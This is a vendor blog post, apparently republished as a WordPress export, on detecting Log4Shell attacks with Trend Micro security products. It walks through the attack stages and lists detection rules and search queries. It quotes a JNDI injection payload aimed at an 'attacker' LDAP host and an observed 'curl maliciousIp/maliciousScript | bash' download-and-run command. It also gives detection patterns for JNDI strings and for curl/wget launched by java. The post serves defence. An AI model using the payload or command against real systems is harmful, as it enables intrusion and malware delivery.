{"id":45052,"date":"2022-01-27T00:00:00","date_gmt":"2022-01-27T00:00:00","guid":{"rendered":"urn:uuid:31840138-6ae8-6dd9-2e9e-086eed757fc4"},"modified":"2022-01-27T00:00:00","modified_gmt":"2022-01-27T00:00:00","slug":"how-to-detect-apache-log4j-vulnerabilities","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","title":{"rendered":"How to detect Apache Log4j vulnerabilities"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/thumb-how-to-apache.jpg\"> <body class=\"articlepage page basicpage context-business context-devops\" id=\"readabilityBody\" readability=\"50.665432514305\"> 
<\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"241971700\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"7.2163865546218\">\n<div class=\"article-details\" role=\"heading\" readability=\"33.676470588235\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__display-tag\">Network Security<\/p>\n<p class=\"article-details__description\">Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools.<\/p>\n<p class=\"article-details__author-by\">By: Nitesh Surana <time class=\"article-details__date\">January 27, 2022<\/time> <span>Read time:&nbsp;<\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"30.258620689655\">\n<div readability=\"14.288793103448\">\n<p>In my previous blog, I reviewed&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/21\/l\/how-to-detect-apache-http-server-exploitation.html\">how to detect Apache HTTP server exploitation<\/a>&nbsp;from vulnerabilities in October. Weirdly enough, I wrote that article before the&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/21\/l\/patch-now-apache-log4j-vulnerability-called-log4shell-being-acti.html\">Apache Log4j (Log4Shell) news broke in December 2021<\/a>. 
So I\u2019m back to write about how to detect the infamous Log4j vulnerability (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\" target=\"_blank\" rel=\"noopener\">CVE-2021-44228<\/a>) that allows attackers to achieve remote code execution on the victim servers using the vulnerable versions of the popular library in exposed web applications\/services.<\/p>\n<p><span class=\"body-subhead-title\">Stages of Log4j attack<\/span><\/p>\n<p>Before diving straight into detection\/prevention, let\u2019s first take a look at the different stages of the attack. For the majority of attacks in which Log4j is exploited, the flow looks like this:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-1.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Source: Trend Micro<\/p>\n<p>The above depicts a vulnerable public-facing web service that logs the <b>User-Agent<\/b> field from the HTTP request. Here\u2019s how the attack works:<\/p>\n<ol>\n<li>The malicious Java Naming and Directory Interface (JNDI) payload can arrive in any protocol; it just needs to reach the vulnerable Log4j logging mechanism. In this case, the protocol is HTTP and the payload is sent in the \u2018User-Agent\u2019 header.<\/li>\n<li>The value of the User-Agent header is logged by a vulnerable web application using the Log4j library. 
Logging of fields like these is common in Java-based applications.<\/li>\n<li>The payload ${jndi:ldap:\/\/attacker\/a} is looked up using JNDI, which in turn tries to access the LDAP server.<\/li>\n<li>If remote loading of Java classes is enabled (i.e., if com.sun.jndi.ldap.object.trustURLCodebase is set to true), the attacker\u2019s infrastructure is contacted using one of a set of protocols (LDAP in this case).<\/li>\n<li>The LDAP response can contain either of the two:<\/li>\n<\/ol>\n<ol type=\"a\">\n<li>The response itself might contain the malicious Java bytecode<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-2.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol type=\"a\" start=\"2\">\n<li>The response contains a reference to the attacker\u2019s infrastructure from where the malicious Java class file is fetched.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-3.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>In this case, the Java class file is fetched as follows:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-4.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.5\">\n<div readability=\"28\">\n<ol 
start=\"6\">\n<li>The malicious bytecode is executed, which in turn leads to malicious command and control in step 7.<\/li>\n<li>Malicious command and control is observed between the attacker\u2019s infrastructure and the vulnerable server.<\/li>\n<\/ol>\n<p><span class=\"body-subhead-title\">Detection of Log4j&nbsp;<\/span><\/p>\n<p>Now that we have a fair understanding of what the vulnerability is and how it looks, let\u2019s explore how to detect Log4j attacks using Trend Micro Cloud One\u2122 and Trend Micro Vision One\u2122.<\/p>\n<p>As I mentioned in the last blog, Trend Micro Cloud One is a security services platform for cloud builders composed of seven services. It is integrated with Trend Micro Vision One, which leverages industry-leading XDR capabilities to collect, correlate, and display data from Trend Micro Cloud One in a straightforward dashboard.<\/p>\n<p>In this scenario, we used Trend Micro Cloud One\u2122 \u2013 Network Security and Trend Micro Cloud One\u2122 \u2013 Workload Security to detect Log4j vulnerabilities. Network Security goes beyond traditional intrusion prevention systems (IPS) to inspect ingress and egress traffic, adding another layer of protection in front of the vulnerable Log4j library. 
Simultaneously, Workload Security ensures your containers and datacenters are secured with automated scanning and customizable post-scan actions.<\/p>\n<p>Let\u2019s dissect how Workload Security works:<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-5.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-6.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>Here we see how the different Workload Security modules work in tandem, capturing the overview of different stages of a successful exploit attempt.<\/p>\n<p>The following is a list of IPS rules for detecting Log4j:<\/p>\n<ol>\n<li>1011242 &#8211; Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228 and CVE-2021-45046)<\/li>\n<li>1011249 &#8211; Apache Log4j Denial of Service Vulnerability (CVE-2021-45105)<\/li>\n<li>1005177 &#8211; Restrict Java Bytecode File (Jar\/Class) Download<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-7.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-8.png\" alt=\"How 
to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-9.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Here\u2019s how the rules work to detect the attack at different stages:<\/p>\n<ol>\n<li>IPS rule 1011242 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) detects stage one of the attack, wherein the JNDI payload is injected in the request body\/header\/URI\/uriquery.<\/li>\n<li>IPS rule 1011249 \u2013 Apache Log4j Denial of Service Vulnerability (CVE-2021-45105) detects traffic with the Denial of Service JNDI payload in the request body\/header\/URI\/uriquery.<\/li>\n<li>IPS rule 1005177 &#8211; Restrict Java Bytecode File (Jar\/Class) Download triggers when a client downloads a .class or .jar file, which executes attacker-controlled, malicious code on a target.<\/li>\n<\/ol>\n<p>We also use a log inspection rule to detect the vulnerability.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-10.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>The log inspection rule <b>1011241 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228) <\/b>looks for JNDI payloads in the access logs, with the default path being <b>\/var\/log\/*\/access.log.<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" 
src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-11.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.797747942832\">\n<div readability=\"13.715028150715\">\n<p>Different log sources from other applications can be configured to inspect logs by adding log files using their absolute paths in the <b>Configuration <\/b>tab.<\/p>\n<p>Now that we\u2019ve covered Workload Security detections, let\u2019s review how Network Security helps detect and prevent exploitation of Log4j vulnerabilities using the following IPS filters:<\/p>\n<ol>\n<li>40652: HTTP: Apache Log4j StrSubstitutor Denial-of-Service Vulnerability (ZDI-21-1541) detects an attempt to exploit a <a href=\"https:\/\/www.zerodayinitiative.com\/advisories\/ZDI-21-1541\/\" target=\"_blank\" rel=\"noopener\">denial-of-service vulnerability in Apache Log4j<\/a>. The specific flaw exists due to a failure to properly sanitize values being logged. Successful exploitation results in a denial-of-service condition.<\/li>\n<li>40651: HTTP: JNDI Recursive Variable Replacement in an HTTP Request detects the usage of a recursive variable replacement within a JNDI expression in an HTTP request. While not inherently malicious, traffic of this nature can be used to create a denial-of-service condition in some vulnerable configurations of Log4j or be used to bypass detection of other JNDI vulnerabilities.<\/li>\n<li>40627: HTTP: JNDI Injection in HTTP Request detects an attempt to inject JNDI requests in an HTTP request. While not inherently malicious, the presence of JNDI code in HTTP requests can be indicative of an attempt to exploit a known code execution vulnerability in Log4j.<\/li>\n<li>13876: TCP: Download\/Upload of a Java .class Application detects an attempt to download or upload a .class Java file. 
Oracle Java is an object-oriented programming language used across a vast number of devices and appliances. Based on the expected common occurrence of matches in this filter&#8217;s logic, it should not be deployed inline with a blocking action set until fully performance tested and vetted for false positives in its target production environment. This is a policy filter which, when enabled in certain deployments, may be prone to false-positive conditions as well as possible performance impacts. If Oracle Java is not deployed or anticipated for deployment in your network, this filter should not be enabled in blocking mode.<\/li>\n<li>40640: LDAP: Generic BIND Request (Non-Standard Ports) detects an LDAP BIND request on non-standard ports.<\/li>\n<li>40646: LDAP: Generic BIND Request (Standard Ports) detects an LDAP BIND request on standard ports.<\/li>\n<\/ol>\n<p><span class=\"body-subhead-title\">Tying it all together with Trend Micro Vision One<\/span><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-12.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"44.5\">\n<div readability=\"34\">\n<p>Observed attack techniques from Trend Micro Vision One<\/p>\n<p>We\u2019ve seen how Network Security and Workload Security can detect Log4j vulnerabilities, but what good is that information on its own? Trend Micro Vision One puts together the puzzle so you can have comprehensive visibility across all data in one console. 
Let\u2019s dive into what you can see (pun intended) with Trend Micro Vision One:<\/p>\n<p><i>Observed attack techniques (OATs)<\/i><\/p>\n<p>These are individual alerts that indicate unit steps of high importance (for example, an IPS trigger for the Log4j remote code execution (RCE) vulnerability or a Log Inspection trigger for a Log4j JNDI payload in access logs).<\/p>\n<p>The Trend Micro Vision One Threat Hunting app helps you see if anything suspicious or alarming is happening across endpoints. In this example, the following OATs need to be investigated to narrow down on the whereabouts of a possible intrusion:<\/p>\n<p>F4778 \u2013 Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)<br \/>F4779 \u2013 Log4j Remote Code Execution Vulnerability (CVE-2021-44228)<br \/>F4780 \u2013 Restrict Java Bytecode File (Jar or Class) Download<br \/>F4783 &#8211; Vulnerable LOG4J Version for CVE-2021-44228<br \/>F4801 \u2013 Apache Log4j Denial of Service Vulnerability<br \/>F4795 \u2013 Apache Log4j Remote Code Execution<\/p>\n<p><i>Search App Queries<\/i><\/p>\n<p>The Search app helps find malicious JNDI payloads from different module detections from Workload Security across all endpoints leveraging Trend Micro Vision One. Below are examples of searches I made based on my understanding of the vulnerability and where visible events show up:<\/p>\n<ol>\n<li>Using Search Method: Endpoint Activity Data, look for a parent process with java in the file path creating a curl or wget process. 
In the majority of attacks observed, curl and wget have been used to download and run malicious scripts and executables on vulnerable servers.<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-13.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31\">\n<div readability=\"7\">\n<p>Search: (processCmd:curl OR processCmd:wget) AND parentFilePath:*java*<\/p>\n<ol start=\"2\" readability=\"-1.5\">\n<li readability=\"0\">JNDI payload patterns in the msg field of Workload Security prevention triggers.\n<p>Search: eventName:DEEP_PACKET_INSPECTION_EVENT AND (ruleId:1008610 OR ruleId:1011242 OR ruleId:1011249) AND (&#8220;${&#8221; AND (&#8220;lower:&#8221; OR &#8220;upper:&#8221; OR &#8220;sys:&#8221; OR &#8220;env:&#8221; OR &#8220;java:&#8221; OR &#8220;jndi:&#8221;))<\/p>\n<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-14.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\">\n<div>\n<ol start=\"3\" readability=\"-1.5\">\n<li readability=\"0\">JNDI payload patterns in the remarks field of Workload Security Log Inspection triggers:\n<p>Search: eventName:LOG_INSPECTION_EVENT AND (&#8220;${&#8221; AND (&#8220;lower:&#8221; OR &#8220;upper:&#8221; OR &#8220;sys:&#8221; OR &#8220;env:&#8221; OR &#8220;java:&#8221; OR &#8220;jndi:&#8221;))<\/p>\n<\/li>\n<\/ol><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" 
src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-15.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<p><i>Root-cause analysis (RCA)<\/i><\/p>\n<p>In Trend Micro Vision One, we can use the Execution Profile to perform a deeper RCA, helping analysts understand the chain of events of the attacks that attempt to exploit Log4j.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-16.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>In the attacks we observed, the Log4j vulnerability is exploited to download malicious shell scripts on the target machine using <b>curl <\/b>or <b>wget <\/b>and execute them by piping them to <b>bash <\/b>or <b>sh<\/b>: curl maliciousIp\/maliciousScript | bash.<\/p>\n<p>The RCA above explains the outbound connections to an attacker-controlled IP address and the creation of Executable and Linkable Format (ELF) binaries. 
The ELFs downloaded are made executable by using the <b>chmod <\/b>utility.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-17.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"34.5\">\n<div readability=\"14\">\n<p>In this RCA, we see shell commands like <b>clear<\/b>, <b>id<\/b>, and <b>whoami<\/b> being executed with <b>systemd-shell<\/b> as the parent process. As we can see, they stem from the <b>bash <\/b>shell and the command line is logged by the Activity Monitoring module.<\/p>\n<p><i>Workbench<\/i><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-18.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-19.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36\">\n<div readability=\"17\">\n<p>The Trend Micro Vision One Workbench helps you visualize and take action on the most significant events observed in an environment. These detections include telemetry from various Trend Micro products (in this case, Trend Micro Cloud One services) and the Workbench condenses them into a single-pane-of-glass view.<\/p>\n<p>Here we see <b>Bash Shell Script Execution<\/b> is observed right after the IPS trigger for Log4j. 
The Impact Scope displays the number of hosts\/servers observed for correlation activity to the alert. The highlighted fields (<b>processCmd<\/b>, <b>processFilePath<\/b>) on the left are what\u2019s being monitored across other deployments and workloads throughout the organization.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-20.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-21.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.119658119658\">\n<div readability=\"10.373219373219\">\n<p>In this trigger, we see the outbound network activity to a known cryptocurrency mining pool after the Log4j vulnerability is exploited. Attackers have been exploiting the vulnerability to deliver cryptocurrency coinminers and <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/20\/g\/mirai-botnet-attack-iot-devices-via-cve-2020-5902.html\">MIRAI botnet malware<\/a>. 
The Command and Control (C&amp;C) observed is logged by the Web Reputation Service and Activity Monitoring.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-22.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>In this Workbench trigger, the event is from the Log Inspection module, wherein the JNDI payload was observed in the access logs of a web server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/devops\/22\/a\/how-to-detect-apache-log4j-vulnerabilities\/img-23.png\" alt=\"How to detect Apache Log4j vulnerabilities\"> <\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"26.8125\">\n<div readability=\"8.25\">\n<p><span class=\"body-subhead-title\">Next steps<\/span><\/p>\n<p>Keep up to date on developing Log4Shell news here. 
You can also <a href=\"https:\/\/cloudone.trendmicro.com\/trial\" target=\"_blank\" rel=\"noopener\">start a free trial<\/a> or check out our <a href=\"https:\/\/cloudone.trendmicro.com\/docs\/?_ga=2.41688935.491843228.1642438585-undefined&amp;_gac=1.222199146.1641915013.Cj0KCQiA8vSOBhCkARIsAGdp6RQh2xY-pI-nrwoqrS1BZ3NGml1py5GO_dOsM7Yg21O7nETAwVI05zAaAnrSEALw_wcB\" target=\"_blank\" rel=\"noopener\">extensive documentation library<\/a> to see how Trend Micro Vision One powers layered detection and response for our cloud-builder security platform, Trend Micro Cloud One.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/devops\/22\/a\/detect-log4j-vulnerabilities.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Explore how to detect Apache Log4j (Log4Shell) vulnerabilities using cloud-native security tools. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":45053,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9503,9501,9571,9507,9676,9500],"yoast_head_json":{"title":"How to detect Apache Log4j vulnerabilities 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","canonical":"https:\/\/www.threatshub.org\/blog\/how-to-detect-apache-log4j-vulnerabilities\/","article_published_time":"2022-01-27T00:00:00+00:00","author":"TH Author","twitter_misc":{"Written by":"TH Author","Est. reading time":"9 minutes"}}}